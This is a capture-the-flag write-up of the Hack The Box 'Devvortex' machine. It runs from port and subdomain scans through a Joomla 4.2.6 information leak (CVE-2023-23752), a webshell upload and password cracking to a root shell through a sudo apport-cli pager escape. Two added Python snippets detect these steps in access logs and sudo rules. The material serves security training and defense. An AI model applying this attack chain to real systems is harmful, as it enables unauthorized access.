Box information

A Linux machine, rated Easy.

Information gathering

Port scanning

Nmap port scan:

kali@kali ~/D/H/M/Devvortex [SIGINT]> nmap -p- -n --min-rate 2000 -T4 10.10.11.242
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-06 07:30 EST
Nmap scan report for 10.10.11.242
Host is up (0.27s latency).
Not shown: 65463 filtered tcp ports (no-response), 70 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 66.15 seconds

Initial foothold

Visiting the web page directly redirects to devvortex.htb, so add a record for it to the hosts file.

Subdomain (virtual host) scan with ffuf:

kali@kali ~> ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154


v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://devvortex.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.devvortex.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 154
________________________________________________

dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 1472ms]
:: Progress: [4989/4989] :: Job [1/1] :: 12 req/sec :: Duration: [0:02:06] :: Errors: 9 ::

Add the dev.devvortex.htb subdomain to the hosts file as well.

Scan for directories and files:

kali@kali ~ [2]> ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://dev.devvortex.htb/FUZZ


v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://dev.devvortex.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.gitreview [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 1537ms]
administrator [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 1002ms]
api [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 1002ms]
cache [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 470ms]
components [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 914ms]
images [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 682ms]
includes [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 588ms]
language [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 415ms]
layouts [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 581ms]
libraries [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 409ms]
media [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 530ms]
modules [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 326ms]
plugins [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 552ms]
robots.txt [Status: 200, Size: 764, Words: 78, Lines: 30, Duration: 2426ms]
templates [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 871ms]
tmp [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 885ms]
:: Progress: [4723/4723] :: Job [1/1] :: 41 req/sec :: Duration: [0:02:36] :: Errors: 119 ::

The robots.txt file shows that the site runs Joomla.

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

The exact version is readable at the URI /administrator/manifests/files/joomla.xml:

<author>Joomla! Project</author>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<copyright>(C) 2019 Open Source Matters, Inc.</copyright>
<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
<version>4.2.6</version>
<creationDate>2022-12</creationDate>

The matching exploit is: https://github.com/Acceis/exploit-CVE-2023-23752.git

The exploit leaks login credentials; use them to log in to the administrator back end.

Uploading a malicious template (theme) file gives a webshell, which in turn gives the initial foothold:
https://github.com/p0dalirius/Joomla-webshell-plugin
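Seen from the defender's side, every step of the foothold above leaves a trace in the nginx access log: the manifest read that disclosed the Joomla version, and the unauthenticated api/v1 requests with public=true that CVE-2023-23752 relies on. The following is an added example, not code from the writeup or from the linked projects; the log lines are constructed, and the combined log format and the exact API paths are assumptions taken from the public exploit rather than from this page.

```python
import re
from typing import Dict, List

# Constructed nginx "combined" access-log lines (not captured from the box).
SAMPLE_LOG = """\
10.10.14.5 - - [06/Dec/2023:07:35:01 -0500] "GET /administrator/manifests/files/joomla.xml HTTP/1.1" 200 1532 "-" "curl/8.4.0"
10.10.14.5 - - [06/Dec/2023:07:35:09 -0500] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 2470 "-" "Ruby"
10.10.14.5 - - [06/Dec/2023:07:35:10 -0500] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 1810 "-" "Ruby"
192.0.2.10 - - [06/Dec/2023:07:36:00 -0500] "GET /index.php/component/content/ HTTP/1.1" 200 23221 "-" "Mozilla/5.0"
192.0.2.11 - - [06/Dec/2023:07:36:02 -0500] "GET /robots.txt HTTP/1.1" 200 764 "-" "Mozilla/5.0"
"""

# Client IP, method, request path and status code from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Indicators and the label a SOC would attach to a hit.
RULES = [
    (re.compile(r'^/administrator/manifests/files/joomla\.xml$'), 'joomla-version-fingerprint'),
    (re.compile(r'^/api/index\.php/v1/(config/application|users)\?.*\bpublic=true\b'),
     'cve-2023-23752-info-disclosure'),
]


def scan_access_log(text: str) -> Dict[str, List[str]]:
    """Return {indicator: [client IPs]} for matching requests.

    Only 2xx responses count: a 403/404 means the disclosure did not happen,
    which is exactly what the nginx deny rules for these paths should produce.
    """
    hits: Dict[str, List[str]] = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m['status'].startswith('2'):
            continue
        for pattern, label in RULES:
            if pattern.search(m['path']):
                hits.setdefault(label, []).append(m['ip'])
    return hits


if __name__ == '__main__':
    for label, ips in scan_access_log(SAMPLE_LOG).items():
        print(f'{label}: {sorted(set(ips))}')
```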

User privileges

After the initial foothold, gather information with linpeas:

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 885/nginx: worker p
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN 885/nginx: worker p
tcp6 0 0 :::22 :::* LISTEN -

╔══════════╣ Users with console
logan:x:1000:1000:,,,:/home/logan:/bin/bash
root:x:0:0:root:/root:/bin/bash

lrwxrwxrwx 1 root root 44 Sep 25 16:40 /etc/nginx/sites-enabled/dev.devvortex.htb -> /etc/nginx/sites-available/dev.devvortex.htb
server {
    listen 80;
    server_name dev.devvortex.htb;
    root /var/www/dev.devvortex.htb;
    index index.html index.htm index.php;
    charset utf-8;
    access_log /var/log/nginx/dev.devvortex.htb.access.log;
    error_log /var/log/nginx/dev.devvortex.htb.error.log info;
    location / {
        try_files $uri $uri/ /index.php?$args;
    }
    location ~* /(images|cache|media|logs|tmp)/.*.(php|pl|py|jsp|asp|sh|cgi)$ {
        return 403;
        error_page 403 /403_error.html;
    }
    location = /favicon.ico { access_log off; log_not_found off; }
    location = /robots.txt { access_log off; log_not_found off; }
    error_page 404 /index.php;
    location ~ .php$ {
        fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
        fastcgi_index index.php;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include /etc/nginx/fastcgi.conf;
    }
    location ~ /\.(?!well-known).* {
        deny all;
    }
    location /api/ {
        try_files $uri $uri/ /api/index.php?$args;
    }
}

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/logan/.bash_history
/home/logan/user.txt
/root/
/var/www
/var/www/dev.devvortex.htb/templates/cassiopeia/cassiopeia/index.php
/var/www/dev.devvortex.htb/templates/cassiopeia/cassiopeia/component.php
/var/www/dev.devvortex.htb/templates/cassiopeia/index.php
/var/www/dev.devvortex.htb/templates/cassiopeia/component.php

The only user with a login shell is logan. Dump the password hashes from the database, crack them with john, and obtain the user's password.

Root privileges

With the password in hand, check which commands may be run with sudo:

logan@devvortex:~$ sudo -l
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli

Look up the corresponding vulnerability:
https://github.com/advisories/GHSA-qgrc-7333-5cgx

A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit.
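The advisory's own assessment is that this sudo rule is the real misconfiguration, so the useful defender check is an audit of sudo -l output for commands that hand control to an interactive pager or editor. The following is an added example, not part of the writeup: the input is a constructed sudo -l listing modelled on the one above, and the set of pager-spawning binaries beyond apport-cli is an assumption of this example.

```python
import re
from typing import List, Tuple

# Constructed `sudo -l` output modelled on the listing above (not a captured file).
SUDO_L_OUTPUT = """\
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
    (root) NOPASSWD: /usr/bin/systemctl status nginx
"""

# Binaries that open an interactive pager or editor while running under sudo.
# apport-cli is the one on this page (GHSA-qgrc-7333-5cgx); the rest are
# well-known additions and an assumption of this example, not of the writeup.
PAGER_SPAWNERS = {'apport-cli', 'less', 'more', 'man', 'vi', 'vim', 'nano'}

# "(runas) [TAG: ...] command", e.g. "(ALL : ALL) /usr/bin/apport-cli".
RULE_RE = re.compile(r'^\s*\(([^)]*)\)\s*((?:\w+:\s*)*)(.+)$')


def parse_sudo_l(text: str) -> List[Tuple[str, str, str]]:
    """Return (runas, tags, command) for every rule after the 'may run' header."""
    rules: List[Tuple[str, str, str]] = []
    in_rules = False
    for line in text.splitlines():
        if 'may run the following commands' in line:
            in_rules = True
            continue
        if in_rules and (m := RULE_RE.match(line)):
            rules.append((m.group(1).strip(), m.group(2).strip(), m.group(3).strip()))
    return rules


def risky_rules(text: str) -> List[str]:
    """Commands whose binary is known to drop the user into a pager/editor."""
    flagged = []
    for _runas, _tags, cmd in parse_sudo_l(text):
        binary = cmd.split()[0].rsplit('/', 1)[-1]
        if binary in PAGER_SPAWNERS:
            flagged.append(cmd)
    return flagged


if __name__ == '__main__':
    for cmd in risky_rules(SUDO_L_OUTPUT):
        print(f'review sudo rule: {cmd} (interactive pager/editor reachable as root)')
```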

Root obtained:

logan@devvortex:~$ sudo /usr/bin/apport-cli -f

*** What kind of problem do you want to report?


Choices:
1: Display (X.org)
2: External or internal storage devices (e. g. USB sticks)
3: Security related problems
4: Sound/audio related problems
5: dist-upgrade
6: installation
7: installer
8: release-upgrade
9: ubuntu-release-upgrader
10: Other problem
C: Cancel
Please choose (1/2/3/4/5/6/7/8/9/10/C): 1


*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.

*** What display problem do you observe?


Choices:
1: I don't know
2: Freezes or hangs during boot or usage
3: Crashes or restarts back to login screen
4: Resolution is incorrect
5: Shows screen corruption
6: Performance is worse than expected
7: Fonts are the wrong size
8: Other display-related problem
C: Cancel
Please choose (1/2/3/4/5/6/7/8/C): 2

***

To debug X freezes, please see https://wiki.ubuntu.com/X/Troubleshooting/Freeze

Press any key to continue...

..dpkg-query: no packages found matching xorg
................

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
S: Send report (1.5 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): V
root@devvortex:/home/logan# ls
user.txt
root@devvortex:/home/logan# whoami
root

Summary

Looking back, the whole path seems simple, but during the actual test getting the initial foothold took a long time.